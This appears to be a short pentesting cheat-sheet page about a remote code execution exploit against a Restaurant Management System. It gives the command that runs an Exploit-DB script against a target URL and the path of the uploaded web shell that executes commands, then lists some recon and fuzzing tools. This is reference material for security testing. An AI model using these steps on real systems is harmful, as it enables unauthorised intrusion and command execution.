Exploit Notes

Restaurant Management System (RMS) Pentesting

Last modified: 2023-01-29

Web

Remote Code Execution (RCE) v1.0

See the Exploit-DB for details.

python3 rms-rce.py https://example.com/rms/

When uploading successfully, we can access to https://example.com/rms/images/reverse-shell.php?cmd=id

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.